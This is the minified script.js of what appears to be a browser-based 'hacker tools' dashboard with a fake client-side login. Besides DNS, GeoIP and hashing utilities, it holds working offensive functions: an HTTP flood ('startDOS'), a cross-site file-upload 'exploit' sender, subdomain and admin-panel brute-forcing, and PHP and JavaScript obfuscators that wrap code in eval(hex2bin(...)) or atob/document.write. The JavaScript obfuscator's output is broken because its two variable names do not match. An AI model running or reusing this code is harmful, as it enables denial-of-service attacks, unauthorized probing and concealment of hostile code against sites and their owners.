/* script.js */
function login(){localStorage.setItem('authToken',btoa(JSON.stringify({username:'DavaXbott',expired:new Date(Date.now()+7*24*60*60*1000).toISOString()})));window.location.href='index.html';}
function toggleSidebar(){const s=document.getElementById('sidebar'),b=document.getElementById('backdrop');if(s){s.classList.toggle('active');if(b)b.style.display=s.classList.contains('active')?'block':'none';}}
function logout(){localStorage.removeItem('authToken');window.location.href='login.html';}
const token=localStorage.getItem('authToken');if(!token&&!window.location.href.includes('login.html')&&!window.location.href.includes('contact.html')){window.location.href='login.html';}
function loadUserInfo(){try{if(!token)return;const p=JSON.parse(atob(token));document.querySelectorAll('#sidebarUsername').forEach(e=>{if(e)e.textContent=p.username||'DavaXbott';});}catch(e){}}
function updateDateTime(){const e=document.getElementById('dateTime');if(e){const n=new Date();e.innerHTML='<i class="fa-regular fa-calendar"></i> '+n.getFullYear()+'-'+String(n.getMonth()+1).padStart(2,'0')+'-'+String(n.getDate()).padStart(2,'0')+' '+String(n.getHours()).padStart(2,'0')+':'+String(n.getMinutes()).padStart(2,'0')+':'+String(n.getSeconds()).padStart(2,'0');}}
function showPage(i){document.querySelectorAll('.page').forEach(p=>p.classList.remove('active'));document.getElementById(i).classList.add('active');}
function hideAllPages(){document.querySelectorAll('.page').forEach(p=>p.classList.remove('active'));}
function copyText(i){const e=document.getElementById(i);if(!e||!e.value)return alert('No text to copy!');e.select();document.execCommand('copy');alert('Copied!');}
function downloadText(i,f){const e=document.getElementById(i);if(!e||!e.value)return alert('No text to download!');const b=new Blob([e.value],{type:'text/plain'});const a=document.createElement('a');a.href=URL.createObjectURL(b);a.download=f;a.click();}
function clearResult(i,s){const e=document.getElementById(i);if(e){e.textContent='';if(e.tagName==='TEXTAREA')e.value='';}if(s){const st=document.getElementById(s);if(st)st.textContent='';}}
function setStatus(i,m){const e=document.getElementById(i);if(e)e.textContent=m;}
async function getSource(){const u=document.getElementById('srcUrl').value.trim();if(!u)return alert('Enter URL!');setStatus('srcStatus','Fetching source...');try{const r=await fetch('https://api.allorigins.win/raw?url='+encodeURIComponent(u));const t=await r.text();document.getElementById('srcResult').value=t;setStatus('srcStatus','Success!');}catch{setStatus('srcStatus','Failed');}}
fetch('https://api64.ipify.org?format=json').then(r=>r.json()).then(d=>document.getElementById('ipResult').textContent='IP: '+d.ip).catch(()=>document.getElementById('ipResult').textContent='Failed');
async function getHeaders(){const u=document.getElementById('hdUrl').value.trim();if(!u)return alert('Enter URL!');try{const r=await fetch('https://api.allorigins.win/raw?url='+encodeURIComponent(u));let h='';r.headers.forEach((v,k)=>h+=k+': '+v+'\n');document.getElementById('hdResult').textContent=h||'No headers.';}catch{document.getElementById('hdResult').textContent='Failed';}}
async function getDomainIP(){const d=document.getElementById('domInput').value.trim();if(!d)return alert('Enter domain!');try{const r=await fetch('https://dns.google/resolve?name='+d);const data=await r.json();const ip=data.Answer?data.Answer.map(a=>a.data).join(', '):'Not found.';document.getElementById('domResult').textContent='IP: '+ip;}catch{document.getElementById('domResult').textContent='Failed';}}
async function getGeoIP(){const i=document.getElementById('geoInput').value.trim();if(!i)return alert('Enter IP!');try{const r=await fetch('https://ipwho.is/'+i);const d=await r.json();if(!d.success){document.getElementById('geoResult').textContent='IP not found';return;}document.getElementById('geoResult').textContent='IP: '+d.ip+'\nCountry: '+d.country+'\nCity: '+d.city+'\nISP: '+d.isp;}catch{document.getElementById('geoResult').textContent='Failed';}}
async function dnsLookup(){const d=document.getElementById('dnsInput').value.trim(),t=document.getElementById('dnsType').value;if(!d)return alert('Enter domain!');try{const r=await fetch('https://dns.google/resolve?name='+d+'&type='+t);const data=await r.json();let o='Record '+t+':\n';if(data.Answer&&data.Answer.length>0)data.Answer.forEach(a=>o+=a.data+'\n');else o+='Not found.';document.getElementById('dnsResult').textContent=o;}catch{document.getElementById('dnsResult').textContent='Failed';}}
function minifyHTML(){const h=document.getElementById('minifyInput').value;if(!h)return alert('Enter HTML!');document.getElementById('minifyResult').value=h.replace(/\s+/g,' ').replace(/>\s+</g,'><').trim();}
async function findSubdomain(){const d=document.getElementById('subInput').value.trim();if(!d)return alert('Enter domain!');document.getElementById('subResult').textContent='Searching...';const s=['www','mail','ftp','webmail','smtp','pop','ns1','cpanel','whm','blog','dev','admin','forum','news','vpn','mysql','support','mobile','static','docs','beta','shop','secure','demo','wiki','media','email','images','download','stats','dashboard','portal','login','api','cdn','live','video','files','store','panel','cloud','test','upload','data','backup'];let f=[];for(let s of s){try{const r=await fetch('https://dns.google/resolve?name='+s+'.'+d);const data=await r.json();if(data.Answer&&data.Answer.length>0)f.push(s+'.'+d);}catch{}}document.getElementById('subResult').textContent=f.length>0?f.join('\n'):'Not found.';}
async function crawlEndpoint(){const u=document.getElementById('crawlUrl').value.trim();if(!u)return alert('Enter URL!');document.getElementById('crawlResult').textContent='Crawling...';try{const r=await fetch('https://api.allorigins.win/raw?url='+encodeURIComponent(u));const html=await r.text();const m=html.match(/(?:href|src|action)=["']([^"']+)["']/g);let e=[];if(m){m.forEach(m=>{const end=m.replace(/(?:href|src|action)=["']/,'').replace(/["']$/,'');if(end&&!end.startsWith('http')&&!end.startsWith('#'))e.push(end);});}document.getElementById('crawlResult').textContent=e.length>0?e.join('\n'):'Not found.';}catch{document.getElementById('crawlResult').textContent='Failed';}}
function generateHash(){const t=document.getElementById('hashInput').value,ty=document.getElementById('hashType').value;if(!t)return alert('Enter text!');let r='';if(ty==='md5')r=CryptoJS.MD5(t).toString();else if(ty==='sha1')r=CryptoJS.SHA1(t).toString();else if(ty==='sha256')r=CryptoJS.SHA256(t).toString();else if(ty==='sha512')r=CryptoJS.SHA512(t).toString();document.getElementById('hashResult').textContent=ty.toUpperCase()+': '+r;}
function convertText(){const t=document.getElementById('convInput').value,ty=document.getElementById('convType').value;if(!t)return alert('Enter text!');let r='';if(ty==='ascii')r=t.split('').map(c=>c.charCodeAt(0)).join(' ');else if(ty==='binary')r=t.split('').map(c=>c.charCodeAt(0).toString(2).padStart(8,'0')).join(' ');else if(ty==='base64')r=btoa(t);else if(ty==='hex')r=t.split('').map(c=>c.charCodeAt(0).toString(16).padStart(2,'0')).join('');document.getElementById('convResult').textContent=r;}
async function reverseIP(){const i=document.getElementById('revInput').value.trim();if(!i)return alert('Enter domain or IP!');document.getElementById('revResult').textContent='Searching...';try{const ip=i.match(/^\d+\.\d+\.\d+\.\d+$/)?i:await fetch('https://dns.google/resolve?name='+i).then(r=>r.json()).then(d=>d.Answer?d.Answer[0].data:null);if(!ip){document.getElementById('revResult').textContent='IP not found.';return;}const r=await fetch('https://api.hackertarget.com/reverseiplookup/?q='+ip);const data=await r.text();document.getElementById('revResult').textContent=data||'Not found.';}catch{document.getElementById('revResult').textContent='Failed';}}
function generateJSO(){const t=document.getElementById('jsoInput').value;if(!t)return alert('Enter text!');const e=btoa(unescape(encodeURIComponent(t)));document.getElementById('jsoResult').value='var _0x'+Math.random().toString(36).substring(2,8)+'=atob("'+e+'");document.write(_0x'+Math.random().toString(36).substring(2,8)+');';}
async function findAdmin(){const u=document.getElementById('adminUrl').value.trim();if(!u)return alert('Enter URL!');document.getElementById('adminResult').textContent='Scanning...';const p=['admin','admin.php','admin.html','administrator','login','login.php','wp-admin','dashboard','panel','cpanel','admincp','moderator','admin/login','admin/index','admin/dashboard'];let f=[];for(let p of p){try{const tu=u.replace(/\/$/,'')+'/'+p;await fetch(tu,{mode:'no-cors'});f.push(tu);}catch{}}document.getElementById('adminResult').textContent=f.length>0?f.join('\n'):'Not found.';}
function obfuscatePHP(){const c=document.getElementById('phpInput').value,l=document.getElementById('phpLevel').value;if(!c)return alert('Enter PHP code!');let r=c;if(l==='low')r=c.replace(/\$([a-zA-Z_]\w*)/g,'$$_$1');else if(l==='medium'){const v=['a','b','c','d','e','f','g','h','i','j'];let idx=0;r=c.replace(/\$([a-zA-Z_]\w*)/g,function(){return '$'+v[idx++%v.length];});}else{r=c.split('').map(c=>c.charCodeAt(0).toString(16).padStart(2,'0')).join('');r='eval(hex2bin("'+r+'"));';}document.getElementById('phpResult').value=r;}
function csrfTest(){const u=document.getElementById('csrfUrl').value.trim();if(!u)return alert('Enter target URL!');document.getElementById('csrfResult').textContent='Sending exploit...';const f=document.getElementById('csrfField').value||'file',c=document.getElementById('csrfCookie').value;const hr=document.getElementById('csrfHeaders').value;const h={};if(hr){hr.split('\n').forEach(line=>{const p=line.split(':');if(p.length===2)h[p[0].trim()]=p[1].trim();});}const fd=new FormData();fd.append(f,new Blob(['test'],{type:'text/plain'}),'test.txt');fetch(u,{method:'POST',body:fd,headers:h,credentials:c?'include':'omit'}).then(()=>{document.getElementById('csrfResult').textContent='Exploit sent!';}).catch(()=>{document.getElementById('csrfResult').textContent='Exploit sent (no-cors).';});}
let dosInterval=null,dosCount=0;
function startDOS(){const u=document.getElementById('dosUrl').value.trim(),d=parseInt(document.getElementById('dosDuration').value)||30;if(!u)return alert('Enter target URL!');if(dosInterval){alert('Attack already running!');return;}dosCount=0;document.getElementById('dosResult').textContent='Attacking '+u+'...';dosInterval=setInterval(()=>{for(let i=0;i<20;i++){fetch(u,{mode:'no-cors'}).catch(()=>{});dosCount++;}document.getElementById('dosResult').textContent='Packets: '+dosCount+' | Target: '+u;},100);setTimeout(()=>{clearInterval(dosInterval);dosInterval=null;document.getElementById('dosResult').textContent='Finished. Total packets: '+dosCount;},d*1000);}
function stopDOS(){if(dosInterval){clearInterval(dosInterval);dosInterval=null;document.getElementById('dosResult').textContent='Stopped. Packets: '+dosCount;}}
document.addEventListener('DOMContentLoaded',()=>{loadUserInfo();updateDateTime();setInterval(updateDateTime,1000);document.querySelectorAll("#sidebar a").forEach(link=>{link.addEventListener("click",()=>{document.getElementById("sidebar")?.classList.remove("active");document.getElementById("backdrop")?.style.setProperty('display','none');});});});
const canvas=document.getElementById("bg");if(canvas){const ctx=canvas.getContext("2d");canvas.width=window.innerWidth;canvas.height=window.innerHeight;let points=[];for(let i=0;i<70;i++){points.push({x:Math.random()*canvas.width,y:Math.random()*canvas.height,vx:(Math.random()-0.5)*0.5,vy:(Math.random()-0.5)*0.5});}function animate(){ctx.clearRect(0,0,canvas.width,canvas.height);points.forEach(p=>{p.x+=p.vx;p.y+=p.vy;if(p.x<0||p.x>canvas.width)p.vx*=-1;if(p.y<0||p.y>canvas.height)p.vy*=-1;ctx.beginPath();ctx.arc(p.x,p.y,2,0,Math.PI*2);ctx.fillStyle="#888";ctx.fill();});for(let i=0;i<points.length;i++){for(let j=i+1;j<points.length;j++){let dx=points[i].x-points[j].x,dy=points[i].y-points[j].y,dist=Math.sqrt(dx*dx+dy*dy);if(dist<120){ctx.strokeStyle="rgba(136,136,136,"+(1-dist/120)+")";ctx.lineWidth=0.7;ctx.beginPath();ctx.moveTo(points[i].x,points[i].y);ctx.lineTo(points[j].x,points[j].y);ctx.stroke();}}}requestAnimationFrame(animate);}animate();window.addEventListener("resize",()=>{canvas.width=window.innerWidth;canvas.height=window.innerHeight;});}